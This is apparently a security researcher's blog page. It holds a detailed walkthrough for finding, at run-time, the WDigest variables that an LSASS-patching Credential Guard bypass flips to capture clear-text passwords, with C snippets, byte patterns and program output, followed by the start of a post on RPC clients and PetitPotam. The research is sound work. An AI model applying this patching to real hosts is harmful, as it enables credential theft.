Reading view

A Practical Guide to PrintNightmare in 2024

Insomni'hack 2024 CTF Teaser - Cache Cache

A Deep Dive into TPM-based BitLocker Drive Encryption

CVE-2022-41099 - Analysis of a BitLocker Drive Encryption Bypass

Bypassing PPL in Userland (again)

Insomni'hack 2023 CTF Teaser - InsoBug

Debugging Protected Processes

The End of PPLdump

Bypassing LSA Protection in Userland

Revisiting a Credential Guard Bypass

From RpcView to PetitPotam

Fuzzing Windows RPC with RpcView

Do You Really Know About LSA Protection (RunAsPPL)?



An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

Revisiting a Credential Guard Bypass

You have probably already heard or read about this clever Credential Guard bypass, which consists of simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead.



Background

As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, there are two lsass.exe processes, the usual one and one running inside a Hyper-V Virtual Machine. Accessing the juicy stuff in this isolated lsass.exe process therefore means breaking the hypervisor, which is not an easy task.

However, in August 2020, an article was posted on Team Hydra’s blog with the following title: Bypassing Credential Guard. In this post, @N4k3dTurtl3 discussed a very clever and simple trick. In short, the all too well-known WDigest module (wdigest.dll), which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their names are rather self-explanatory: the first one holds the state of Credential Guard within the module (is it enabled or not?), and the second one determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard was not enabled and as if the system was configured to keep clear-text passwords in memory. Once these two values have been properly patched within the LSASS process, the latter will keep a copy of the user’s password when the next authentication occurs. In other words, you won’t be able to access previously stored credentials but you will be able to extract clear-text passwords afterwards.

The implementation of this technique is rather simple. You first determine the offsets of the two global variables by loading wdigest.dll in a disassembler or a debugger along with the public symbols (the offsets may vary depending on the file version). After that, you just have to find the module’s base address to calculate their absolute address. Once their location is known, the values can be patched and/or restored in the target lsass.exe process.

The original PoC is available here. I found two other projects implementing it: WdToggle (a BOF module for Cobalt Strike) and EDRSandblast. All these implementations rely on hardcoded offsets, but is there a more elegant way? Is it possible to find them at run-time?

We need a plan



If we want to find the offsets of these two variables, we first have to understand how and where they are stored. So let’s fire up Ghidra, import the file C:\Windows\System32\wdigest.dll, load the public symbols and analyze the whole.



Loading the symbols allows us to quickly find these two values from the Symbol Tree. What we learn there is that g_IsCredGuardEnabled and g_fParameter_UseLogonCredential are two 4-byte values (i.e. double words / DWORD values) that are stored in the R/W .data section, nothing surprising about this.

If we take a look at what surrounds these two values, we can see that there is just a bunch of uninitialized data. And even once the module is loaded, there is most probably no particular marker that we will be able to leverage for identifying their location. It is like searching for a needle in a haystack, with the added challenge of not being able to distinguish the needle from the rest of the hay.



So, searching directly in the .data section is definitely not the way to go. There is a better approach: rather than searching for these values, we can search for cross-references! These global variables exist in the first place because they are used somewhere in the code. Therefore, if we can find these references, we can also find the variables.



Ghidra conveniently lists all the cross-references in the “Listing” view, so let’s see if there is anything interesting.



Two cross-references immediately stand out - SpAcceptCredentials and SpInitialize - as they are common to both variables. If we can limit the search to a single place, the whole process will certainly be a bit easier. On top of that, looking at these two functions in the symbol tree, we can see that SpInitialize is exported by the DLL, which means that we can easily get its address with a call to GetProcAddress() for instance.







We can go to the “Decompile” view and have a glimpse at how these variables are used within the SpInitialize function.

The RegQueryValueExW call is interesting because the x86 opcode of a function call is rather easy to identify. From there, we could then work backwards and see how the fifth argument is handled. This is a potential avenue to consider so let’s keep it in mind.

That would be a way to identify the g_fParameter_UseLogonCredential variable but what about g_IsCredGuardEnabled? The code from the “Decompile” view is not that easy to interpret as is, so we will have to go a bit deeper.

g_IsCredGuardEnabled = (uint)((*(byte *)(param_2 + 1) & 0x20) != 0);

Here, I found the assembly code to be less confusing.

mov r15,param_2

; ...

test byte ptr [r15 + 0x4],0x20

cmovnz eax,esi

mov dword ptr [g_IsCredGuardEnabled],eax

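First, the second parameter of the function call - param_2 - is loaded into the R15 register. Then, the byte located at offset 0x04 from this address is read and tested against the mask 0x20 (TEST performs a bitwise AND and only updates the flags). If the bit is set, CMOVNZ copies ESI into EAX, and the result is finally stored in g_IsCredGuardEnabled.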

The function SpInitialize is documented here. The documentation tells us that the second parameter is a pointer to a SECPKG_PARAMETERS structure.

NTSTATUS SpInitializeFn(

[in] ULONG_PTR PackageId,

[in] PSECPKG_PARAMETERS Parameters,

[in] PLSA_SECPKG_FUNCTION_TABLE FunctionTable

)

The structure SECPKG_PARAMETERS is documented here. The attribute located at the offset 0x04 in the structure (cf. byte ptr [R15 + 0x4]) is MachineState.

typedef struct _SECPKG_PARAMETERS {

ULONG Version;

ULONG MachineState;

ULONG SetupMode;

PSID DomainSid;

UNICODE_STRING DomainName;

UNICODE_STRING DnsDomainName;

GUID DomainGuid;









} SECPKG_PARAMETERS, *PSECPKG_PARAMETERS, SECPKG_EVENT_DOMAIN_CHANGE, *PSECPKG_EVENT_DOMAIN_CHANGE;

The documentation provides a list of possible flags for the MachineState attribute but it does not tell us what flag corresponds to the value 0x20. However it does tell us that the SECPKG_PARAMETERS structure is defined in the header file ntsecpkg.h. If so, we should find it in the Windows SDK, along with the SECPKG_STATE_* flags.

// Values for MachineState

#define SECPKG_STATE_ENCRYPTION_PERMITTED 0x01

#define SECPKG_STATE_STRONG_ENCRYPTION_PERMITTED 0x02

#define SECPKG_STATE_DOMAIN_CONTROLLER 0x04

#define SECPKG_STATE_WORKSTATION 0x08

#define SECPKG_STATE_STANDALONE 0x10

#define SECPKG_STATE_CRED_ISOLATION_ENABLED 0x20

#define SECPKG_STATE_RESERVED_1 0x80000000

Here we go! The value 0x20 corresponds to the flag SECPKG_STATE_CRED_ISOLATION_ENABLED, which makes quite a lot of sense in our case. In the end, the previous line of C code could simply be rewritten as follows.

g_IsCredGuardEnabled = (param_2->MachineState & SECPKG_STATE_CRED_ISOLATION_ENABLED) != 0;

Note: I could have also helped Ghidra a bit by defining this structure and editing the prototype of the SpInitialize function to achieve a similar result.
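To make the flag test concrete, here is a minimal sketch in portable C. The `demo_secpkg_parameters` type is a hypothetical, trimmed-down stand-in for SECPKG_PARAMETERS (only the first two 32-bit fields are reproduced), and `is_cred_guard_enabled` is an illustrative name, not something that exists in wdigest.dll.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Flag value taken from ntsecpkg.h, as quoted above. */
#define SECPKG_STATE_CRED_ISOLATION_ENABLED 0x20u

/* Hypothetical stand-in for SECPKG_PARAMETERS: only the two leading
   32-bit fields are needed to reproduce the test at offset 0x04. */
typedef struct {
    uint32_t Version;      /* offset 0x00 */
    uint32_t MachineState; /* offset 0x04 */
} demo_secpkg_parameters;

/* Returns 1 when the credential isolation bit is set, 0 otherwise. */
int is_cred_guard_enabled(const demo_secpkg_parameters *params)
{
    assert(params != NULL);
    return (params->MachineState & SECPKG_STATE_CRED_ISOLATION_ENABLED) != 0;
}
```

With a MachineState of 0x28 (workstation plus credential isolation) the function returns 1, and with 0x09 it returns 0, which mirrors what the TEST/CMOVNZ sequence computes.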

That’s all very well, but do we have clear opcode patterns to search for? The answer is “not really”… Prior to the RegQueryValueExW call, a reference to g_fParameter_UseLogonCredential is loaded in RAX, that’s a rather common operation and we cannot rely on the fact that the compiler will use the same register every time. After the call to RegQueryValueExW, g_fParameter_UseLogonCredential is set to 0 in an if statement. Again this is a generic operation so it is not good enough for establishing a pattern. As for g_IsCredGuardEnabled, there is an interesting set of instructions but we cannot rely on the fact that the compiler will produce the same code every time here either.

; Before the call to RegQueryValueExW

; 180003180 48 8d 05 2d 30 03 00

lea rax,[g_fParameter_UseLogonCredential]

; ...

; 18000318e 48 89 44 24 20

mov qword ptr [rsp + local_b8],rax=>g_fParameter_UseLogonCredential

; After the call to RegQueryValueExW

; 1800031b1 44 89 25 fc 2f 03 00

mov dword ptr [g_fParameter_UseLogonCredential],r12d

; Test on param_2->MachineState

; 18000299b 41 f6 47 04 20

test byte ptr [r15 + 0x4],0x20

; 1800029a0 0f 45 c6

cmovnz eax,esi

; 1800029a3 89 05 5f 32 03 00

mov dword ptr [g_IsCredGuardEnabled],eax







We are (almost) back to square one. However, we had a second option - SpAcceptCredentials - so let’s try our luck with this function. As it turns out, the two variables seem to be used in a single if statement as we can see in the “Decompile” view.







The original assembly consists of a CMP instruction, followed by a MOV instruction.

; 180001839 39 1d 75 49 03 00

cmp dword ptr [g_fParameter_UseLogonCredential],ebx

; 18000183f 8b 05 c3 43 03 00

mov eax,dword ptr [g_IsCredGuardEnabled]

; 180001845 0f 85 9c 77 00 00

jnz LAB_180008fe7

Since the public symbols were imported and the PE file was analyzed, Ghidra conveniently displays the references to the variables rather than addresses or offsets. To better understand how this works though, we should have a look at the “raw” assembly code.

cmp dword ptr [rip + 0x34975],ebx ; 39 1d 75 49 03 00

mov eax,dword ptr [rip + 0x343c3] ; 8b 05 c3 43 03 00

jnz 0x77ae ; 0f 85 9c 77 00 00

On the first line, the first byte - 39 - is the opcode of the CMP instruction that compares a 16 or 32 bit value in a register or a memory location against a 16 or 32 bit register. Then, 1d is the ModR/M byte: it encodes the source register (EBX in this case) and tells the CPU that the other operand is addressed relative to RIP with a 32-bit displacement. Finally, 75 49 03 00 is the little endian representation of the offset of g_fParameter_UseLogonCredential relative to RIP (rip+0x34975). The second line works pretty much the same way although it is a MOV instruction.
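In x86-64 machine code, the byte that follows these opcodes is the ModR/M byte, which is split into three bit fields. The sketch below (helper names are mine) decodes it and checks for the RIP-relative form, i.e. mod = 0 and r/m = 5 in 64-bit mode.

```c
#include <stdint.h>

/* The three bit fields of a ModR/M byte. */
typedef struct {
    uint8_t mod; /* bits 7-6: addressing mode */
    uint8_t reg; /* bits 5-3: register operand (0=EAX, 1=ECX, 2=EDX, 3=EBX, ...) */
    uint8_t rm;  /* bits 2-0: register or memory operand */
} modrm_fields;

modrm_fields decode_modrm(uint8_t b)
{
    modrm_fields f;
    f.mod = (uint8_t)(b >> 6);
    f.reg = (uint8_t)((b >> 3) & 7);
    f.rm  = (uint8_t)(b & 7);
    return f;
}

/* In 64-bit mode, mod == 0 with rm == 5 selects [RIP + disp32]. */
int is_rip_relative(uint8_t b)
{
    modrm_fields f = decode_modrm(b);
    return f.mod == 0 && f.rm == 5;
}
```

For 0x1d, the decoder yields reg = 3 (EBX) with a RIP-relative operand. For 0x05, the ModR/M byte of the MOV instruction, it yields reg = 0 (EAX), again RIP-relative.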

The third line represents a conditional jump, which won’t help us establish a reliable pattern. If we consider only the first two lines though, we can already build a potential pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. We just make the reasonable assumption that the offsets won’t exceed the value 0x00ffffff.

Needless to say, this is not great, but there is still room for improvement, so let’s test it first and see if it is at least good enough as a starting point. For that matter, Ghidra has a convenient “Search Memory” tool that can be used to search for byte patterns.

To my surprise, this simple pattern yielded only one result in the entire file. Of course, it is not completely relevant because the PE file also has uninitialized data that could contain this pattern once it is loaded. Though, to address this issue, we can very well limit the search to the .text section because it is not subject to modifications at run-time.





There is still one last problem. I tested the pattern against a single file. What if this pattern is not generic enough or what if it yields false positives in other versions of wdigest.dll? If only there was an easy way to get my hands on multiple versions of the file to verify that…

And here comes the Windows Binaries Index (or “Winbindex”). This is a nicely designed web application that aggregates all the metadata from update packages released by Microsoft. It also provides a link whenever the file is available for download. Kudos to @m417z for this tool, this is a game changer. From the home page, I can simply search for wdigest.dll and virtually get access to any version of the file.

Apart from the version installed in my VM (10.0.19041.388), I tested the above pattern against the oldest (10.0.10240.18638 - Windows 10 1507) and the most recent version I could find (10.0.22000.434 - Windows 11 21H2) and it worked amazingly well in both cases.



It looks like a plan is starting to emerge. In the end, the overall idea is pretty simple. We have to read the DLL, locate the .text section and simply search for our pattern in the raw data. From the matching buffer, we will then be able to extract the variable offsets and adjust them (more on that later).

Practical implementation

Let me quickly recap what we are trying to achieve. We want to read and patch two global variables within the wdigest.dll module. Because of their nature, these two variables are located in the R/W .data section, but they are not easy to locate as they are just simple boolean flags. However, we identified some code in the .text section that references them. So, the idea is to first extract their offsets from the assembly code, and then get the base address of the target module to find their exact location in the lsass.exe process.

Searching for our code pattern



We want to find a portion of the code that matches the pattern 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. To do so, we have to first locate the .text section of the wdigest.dll PE file. There are two ways to do this. We can either load the module in the memory of our process or read the file from disk. I decided to go for the second option (for no particular reason).

Locating the .text section is easy. The first bytes of the PE file contain the DOS header, which gives us the offset to the NT headers (e_lfanew). In the NT headers, we find the FileHeader member, which gives us the number of sections (NumberOfSections).

typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header

WORD e_magic; // Magic number

// ...

LONG e_lfanew; // File address of new exe header

} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

typedef struct _IMAGE_NT_HEADERS64 {

DWORD Signature;

IMAGE_FILE_HEADER FileHeader;

IMAGE_OPTIONAL_HEADER64 OptionalHeader;

} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;

typedef struct _IMAGE_FILE_HEADER {

WORD Machine;

WORD NumberOfSections;

// ...

} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

We can then simply iterate over the section headers that are located after the NT headers, until we find the one with the name .text.

typedef struct _IMAGE_SECTION_HEADER {

BYTE Name[IMAGE_SIZEOF_SHORT_NAME];

// ...

DWORD SizeOfRawData;

DWORD PointerToRawData;

// ...

} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

Once we have identified the section header corresponding to the .text section, we know its size and offset in the file. With that knowledge, we can invoke SetFilePointer to move the file pointer PointerToRawData bytes from the beginning of the file and read SizeOfRawData bytes into a pre-allocated buffer.

// hFile = CreateFileW(L"C:\\Windows\\System32\\wdigest.dll", ...);

PBYTE pTextSection = (PBYTE)LocalAlloc(LPTR, SectionHeader.SizeOfRawData);

SetFilePointer(hFile, SectionHeader.PointerToRawData, NULL, FILE_BEGIN);

DWORD dwBytesRead = 0; // lpNumberOfBytesRead should not be NULL when lpOverlapped is NULL

ReadFile(hFile, pTextSection, SectionHeader.SizeOfRawData, &dwBytesRead, NULL);
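The header walk described above can also be sketched without any Windows header, by reading the fields at their fixed offsets in a buffer that holds the beginning of the file. This is only an illustration: `find_section` and `section_info` are names I made up, and the offsets (e_lfanew at 0x3c, a 24-byte signature plus file header, 40-byte section headers) come from the PE format.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct {
    uint32_t virtual_address;     /* RVA of the section once loaded */
    uint32_t size_of_raw_data;    /* size of the section in the file */
    uint32_t pointer_to_raw_data; /* offset of the section in the file */
} section_info;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 and fills *out when the named section is found, 0 otherwise. */
int find_section(const uint8_t *file, size_t file_len,
                 const char *name, section_info *out)
{
    assert(file != NULL && name != NULL && out != NULL);

    size_t name_len = strlen(name);
    char padded[8] = {0};
    if (name_len > sizeof(padded)) return 0;
    memcpy(padded, name, name_len); /* section names are NUL-padded to 8 bytes */

    if (file_len < 0x40 || file[0] != 'M' || file[1] != 'Z') return 0;

    size_t nt = rd32(file + 0x3c); /* IMAGE_DOS_HEADER.e_lfanew */
    if (nt > file_len || file_len - nt < 24) return 0;
    if (memcmp(file + nt, "PE\0\0", 4) != 0) return 0;

    uint16_t count    = rd16(file + nt + 6);  /* FileHeader.NumberOfSections */
    uint16_t opt_size = rd16(file + nt + 20); /* FileHeader.SizeOfOptionalHeader */
    size_t sec = nt + 24 + opt_size;          /* first IMAGE_SECTION_HEADER */

    for (uint16_t i = 0; i < count; i++, sec += 40) {
        if (sec > file_len || file_len - sec < 40) return 0;
        if (memcmp(file + sec, padded, 8) == 0) {
            out->virtual_address     = rd32(file + sec + 12);
            out->size_of_raw_data    = rd32(file + sec + 16);
            out->pointer_to_raw_data = rd32(file + sec + 20);
            return 1;
        }
    }
    return 0;
}
```

Calling `find_section(buffer, length, ".text", &info)` on the first few kilobytes of the file should give the same SizeOfRawData and PointerToRawData values as the structure-based approach.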

Then, it is just a matter of reading the buffer, which I did with a simple loop. When I find the byte 0x39, which is the first byte of the pattern, I simply check the following 11 bytes to see if they also match.

// Pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00

j = 0;

// Stop early enough for pTextSection[j + 11] to stay inside the buffer

while (j + 12 <= SectionHeader.SizeOfRawData) {

if (pTextSection[j] == 0x39) {

if ((pTextSection[j + 5] == 0x00) && (pTextSection[j + 6] == 0x8b) && (pTextSection[j + 11] == 0x00)) {

wprintf(L"Match at offset: 0x%04x\r\n", SectionHeader.VirtualAddress + j);

}

}

j++; // Move on to the next byte

}

However, I do not stop at the first occurrence. As a simple safeguard, I check the entire section and count the number of times the pattern is matched. If this count is 0, obviously this means that the search failed. But if the count is greater than 1, I also consider that it failed. I want to make sure that the pattern matches only once.
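The "exactly one match" safeguard can be sketched as a small generic helper. This is not the code from my PoC, just a portable illustration: the pattern is an array of `int` values in which `WILDCARD` (a value I chose arbitrarily) stands for `??`, and the function returns the number of matches so that the caller can reject both 0 and anything greater than 1.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define WILDCARD (-1) /* stands for "??" in the pattern */

/* 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00 */
const int WDIGEST_PATTERN[12] = {
    0x39, WILDCARD, WILDCARD, WILDCARD, WILDCARD, 0x00,
    0x8b, WILDCARD, WILDCARD, WILDCARD, WILDCARD, 0x00
};

/* Counts every position where the pattern matches. The offset of the
   first match is stored in *first_match when it is not NULL. */
size_t count_pattern_matches(const uint8_t *buf, size_t buf_len,
                             const int *pattern, size_t pattern_len,
                             size_t *first_match)
{
    size_t count = 0;

    assert(buf != NULL && pattern != NULL && pattern_len > 0);

    for (size_t i = 0; i + pattern_len <= buf_len; i++) {
        size_t k = 0;
        while (k < pattern_len &&
               (pattern[k] == WILDCARD || buf[i + k] == (uint8_t)pattern[k])) {
            k++;
        }
        if (k == pattern_len) {
            if (count == 0 && first_match != NULL) {
                *first_match = i;
            }
            count++;
        }
    }
    return count;
}
```

The caller would treat any return value other than 1 as a failure, and add the section's VirtualAddress to `*first_match` to obtain the offset of the code relative to the image base.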

Just for testing purposes and out of curiosity, I also tried several variants of the pattern to see how selective it was. Surprisingly, the count dropped very quickly, with only two occurrences for variant #2.

| Variant | Pattern | Occurrences |
|---|---|---|
| 1 | 39 .. .. .. .. 00 .. .. .. .. .. .. | 98 |
| 2 | 39 .. .. .. .. 00 8b .. .. .. .. .. | 2 |
| 3 | 39 .. .. .. .. 00 8b .. .. .. .. 00 | 1 |

If we execute the program, here is what we get so far. We have exactly one match at the offset 0x1839.

C:\Temp>WDigestCredGuardPatch.exe

Exactly one match found, good to go!

Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

For good measure, we can verify if the offset 0x1839 is correct by going back to Ghidra. And indeed, the code we are interested in starts at 0x180001839.

Note: the value 0x180000000 is the default base address of the PE. This value can be found in NtHeaders.OptionalHeader.ImageBase.

Extracting the variable offsets

Below are the bytes that we were able to extract from the .text section, and their equivalent x86_64 disassembly.

cmp dword ptr [rip + 0x34975], ebx ; 39 1D 75 49 03 00

mov eax, dword ptr [rip + 0x343c3] ; 8B 05 C3 43 03 00

And here is the thing I intentionally glossed over in the first part. Since I am not used to reading assembly code, these two lines initially puzzled me. I was expecting to find the addresses of the two variables directly in the code, but instead, I found only RIP-relative offsets.

I learned that the x86_64 architecture indeed uses RIP-relative addressing to reference data. As explained in this post, the main advantage of using this kind of addressing is that it produces Position Independent Code (PIC).

The RIP-relative address of g_fParameter_UseLogonCredential is rip+0x34975. We found the code at the address 0x00001839, so the absolute offset of g_fParameter_UseLogonCredential should be 0x00001839 + 0x34975 = 0x361ae, right?

But the offset is actually 0x361b4. Oh, wait… When an instruction is executed, RIP actually already points to the next one. This means that we must add 6, the length of the CMP instruction, to this value: 0x00001839 + 6 + 0x34975 = 0x361b4. Here we go!

We apply the same method to the second variable - g_IsCredGuardEnabled - and we find: 0x00001839 + 6 + 6 + 0x343c3 = 0x35c08.

We identified the 12 bytes of code and we know their offset in the PE, so the implementation is pretty easy. The RIP-relative offsets are stored using the little endian representation, so we can directly copy the four bytes into DWORD temporary variables if we want to interpret them as unsigned long values.

DWORD dwUseLogonCredentialOffset, dwIsCredGuardEnabledOffset;

RtlMoveMemory(&dwUseLogonCredentialOffset, &Code[2], sizeof(dwUseLogonCredentialOffset));

RtlMoveMemory(&dwIsCredGuardEnabledOffset, &Code[8], sizeof(dwIsCredGuardEnabledOffset));

dwUseLogonCredentialOffset += 6 + dwCodeOffset;

dwIsCredGuardEnabledOffset += 6 + 6 + dwCodeOffset;

wprintf(L"Offset of g_fParameter_UseLogonCredential: 0x%08x\r\n", dwUseLogonCredentialOffset);

wprintf(L"Offset of g_IsCredGuardEnabled: 0x%08x\r\n", dwIsCredGuardEnabledOffset);

And here is the result.

C:\Temp>WDigestCredGuardPatch.exe

Exactly one match found, good to go!

Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

Offset of g_fParameter_UseLogonCredential: 0x000361b4

Offset of g_IsCredGuardEnabled: 0x00035c08
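For reference, the same arithmetic can be written as a small portable helper. One assumption differs from the snippet above: the displacement is read as a signed 32-bit value, since a RIP-relative displacement may be negative in general (it is positive here). The function names are mine.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Reads a little-endian 32-bit displacement as a signed value. */
int32_t read_disp32(const uint8_t *p)
{
    uint32_t v = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                 ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    return (int32_t)v;
}

/* insn:     pointer to the first byte of the instruction
   insn_rva: offset of that byte relative to the image base
   insn_len: total length of the instruction in bytes
   disp_off: position of the disp32 field inside the instruction
   Returns the offset of the referenced data relative to the image base. */
uint32_t rip_relative_target(const uint8_t *insn, uint32_t insn_rva,
                             uint32_t insn_len, uint32_t disp_off)
{
    assert(insn != NULL && disp_off + 4 <= insn_len);
    /* RIP already points to the next instruction when this one executes. */
    int64_t next_rip = (int64_t)insn_rva + insn_len;
    return (uint32_t)(next_rip + read_disp32(insn + disp_off));
}
```

Applied to the 12 matched bytes, `rip_relative_target(code, 0x1839, 6, 2)` gives 0x361b4 and `rip_relative_target(code + 6, 0x1839 + 6, 6, 2)` gives 0x35c08, the two values printed above.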

Finding the base address

Now that we know the absolute offsets of the two global variables, we must determine their absolute address in the target process lsass.exe. Of course, this part was already implemented in the original PoC, using the following method:

- Open the lsass.exe process with PROCESS_ALL_ACCESS.

- List the loaded modules with EnumProcessModules.

- For each module, call GetModuleFileNameExA to determine whether it is wdigest.dll.

- If so, call GetModuleInformation to get its base address.

Ideally, we would like to interact as little as possible with LSASS, but as we need to patch it anyway, this method works perfectly fine. I just wanted to take this opportunity to present another approach and discuss some aspects of Windows DLLs.







The key thing is that the base address of a module is determined when it is first loaded. Therefore, any subsequent process loading this module will use the exact same base address. In our case, this means that if we load wdigest.dll in our current process, we will be able to determine its base address without even having to touch LSASS. (I will admit that this sounds a bit dumb because the whole purpose is to eventually patch it.)

Loading a DLL is commonly done through the Windows API LoadLibraryW or LoadLibraryExW. The documentation states that they return “a handle to the module”, but I would say that it is a bit misleading. These functions actually return an HMODULE, which is not a typical kernel object HANDLE. In reality, the HMODULE value is… the base address of the module.

In conclusion, we can get the base address of wdigest.dll in the lsass.exe process simply by running the following code in our own context. One could argue that loading wdigest.dll might look suspicious, but it is nothing compared to patching LSASS anyway so this is not really my concern here.

HMODULE hModule;

if ((hModule = LoadLibraryW(L"wdigest.dll")))

{

wprintf(L"Base address of wdigest.dll: 0x%016p\r\n", hModule);

FreeLibrary(hModule);

}

After adding this to my own PoC and calculating the addresses, here is what I get. Not bad!

C:\Temp>WDigestCredGuardPatch.exe

Exactly one match found, good to go!

Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

Offset of g_fParameter_UseLogonCredential: 0x000361b4

Offset of g_IsCredGuardEnabled: 0x00035c08

Base address of wdigest.dll: 0x00007FFEE32B0000

Address of g_fParameter_UseLogonCredential: 0x00007ffee32e61b4

Address of g_IsCredGuardEnabled: 0x00007ffee32e5c08



We can confirm that the base address of wdigest.dll is the same by inspecting the memory of the lsass.exe process using Process Hacker for instance.

Conclusion

The first thing I want to say is thank you to @N4k3dTurtl3 for the initial post on this subject. I really liked the simplicity and efficiency of this trick. It always amazes me how this kind of hack can defeat really advanced protections such as Credential Guard.

Now, the question is, as a pentester (or a red teamer), should you use the technique I described in this post? The idea of not having to rely on hardcoded offsets and therefore running code that is version-independent is attractive. However, it might also be a bit riskier as pattern matching is not an exact science. To address this, I implemented a safeguard which consists in ensuring that the pattern is matched exactly once. This leaves us with only one potential false positive: the pattern could be matched exactly once on a random portion of code, which seems rather unlikely. The only risk I see is that Microsoft could slightly change the implementation so that my pattern just no longer works.

As for defenders, enabling Credential Guard should not keep you from enabling LSA protection as well. We all know that it can be completely bypassed, but this operation has a cost for an attacker. It requires running code in the kernel or using a sophisticated userland bypass, both of which create avenues for detection. As rightly said by @N4k3dTurtl3:

The goal is to increase the cost in time, effort, and tooling […] thus making your network less appealing as a target and increasing opportunities for detection and response.

Lastly, this was a cool little challenge, not too difficult, and as always I learned a few things along the way, the perfect recipe. Oh, and if you have read this far, you can find my PoC here.

Links & Resources

- Team Hydra - Bypassing Credential Guard
  https://teamhydra.blog/2020/08/25/bypassing-credential-guard/

- Winbindex - The Windows Binaries Index
  https://winbindex.m417z.com/

- Nynaeve - Most data references in x64 are RIP-relative
  http://www.nynaeve.net/?p=192









From RpcView to PetitPotam



In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool.

The Theory

Before diving into the main subject, I need to discuss some basic concepts first to make sure we are all on the same page. First, as I said in the previous post, DCE/RPC is one of the many IPC (InterProcess Communication) mechanisms used in Windows. It allows a process A - the RPC client - to invoke procedures or functions that are implemented and executed in a process B - the RPC server.

That being said, this raises some questions that I will quickly cover in the next paragraphs.

- How does an RPC client distinguish an RPC server from another?

- How does an RPC client know which procedures/functions are exposed by the RPC server?

- How does an RPC client invoke the remote procedures/functions?

Interface Definition

I assume you are familiar with the concept of interface in the context of Object Oriented Programming (OOP). An interface is a sort of contract, consisting of a set of methods, that an object must fulfill by implementing those methods. With RPC, that’s exactly the same idea. The difference is that the methods are implemented in another process, and can even be accessed from a remote machine on the network.

If a client wants to consume an interface, they first need to know what is written in the interface’s contract. In other words, they need the following information:

- The GUID of the interface: how to identify the interface?

- A protocol sequence: how to interact with this interface?

- An Opnum (i.e. a procedure ID): which procedure to call?

- A set of parameters: what information does the server need in order to execute the procedure?

For that matter, the developer of an RPC server will usually release an IDL (Interface Definition Language) file. The purpose of this file is to provide the developer of an RPC client with all the information they need in order to consume this interface, without having to worry about its actual implementation on the server side. In a way, IDL for RPC interfaces is very similar to what WSDL/WADL are for web services and applications.

As an example, PetitPotam leverages the Encrypting File System Remote Protocol (EFSRPC), which is based on the EFSR interface. You can find the complete IDL file corresponding to this interface here, but I also included an extract below.

import "ms-dtyp.idl";

[

uuid(c681d488-d850-11d0-8c52-00c04fd90f7e),

version(1.0),

]

interface efsrpc

{

typedef [context_handle] void * PEXIMPORT_CONTEXT_HANDLE;

typedef pipe unsigned char EFS_EXIM_PIPE;

/* [snip] */

long EfsRpcOpenFileRaw(

[in] handle_t binding_h,

[out] PEXIMPORT_CONTEXT_HANDLE * hContext,

[in, string] wchar_t * FileName,

[in] long Flags

);

long EfsRpcReadFileRaw(

[in] PEXIMPORT_CONTEXT_HANDLE hContext,

[out] EFS_EXIM_PIPE * EfsOutPipe

);

/* [snip] */

}

In this file, we can find the UUID (Universally Unique Identifier) of the interface, some type definitions, and the prototype of the exposed procedures or functions. That’s all the information a client needs in order to invoke remote procedures.

Protocol Sequence

Knowing which procedures/functions are exposed by an interface isn’t actually sufficient to interact with it. The client also needs to know how to access this interface. The way a client talks to an RPC server is called the protocol sequence. Depending on the implementation of the RPC server, a given interface might even be accessible through multiple protocol sequences.

Generally speaking, Windows supports three protocols (source):

| RPC Protocol | Description |
|---|---|
| NCACN | Network Computing Architecture connection-oriented protocol |
| NCADG | Network Computing Architecture datagram protocol |
| NCALRPC | Network Computing Architecture local remote procedure call |

RPC protocols used for remote connections (NCACN and NCADG) through a network can be supported by many “transport” protocols. The most common transport protocol is obviously TCP/IP, but other more exotic protocols can also be used, such as IPX/SPX or AppleTalk DSP. The complete list of supported transport protocols is available here.

Although 14 Protocol Sequences are supported, only 4 of them are commonly used:

| Protocol Sequence | Description |
|---|---|
| ncacn_ip_tcp | Connection-oriented Transmission Control Protocol/Internet Protocol (TCP/IP) |
| ncacn_np | Connection-oriented named pipes |
| ncacn_http | Connection-oriented TCP/IP using Microsoft Internet Information Server as HTTP proxy |
| ncalrpc | Local procedure call |



For instance, when using ncacn_np, the DCE/RPC requests are encapsulated inside SMB packets and sent to a remote named pipe. On the other hand, when using ncacn_ip_tcp, DCE/RPC requests are directly sent over TCP. I made the following diagram to illustrate these 4 protocol sequences.
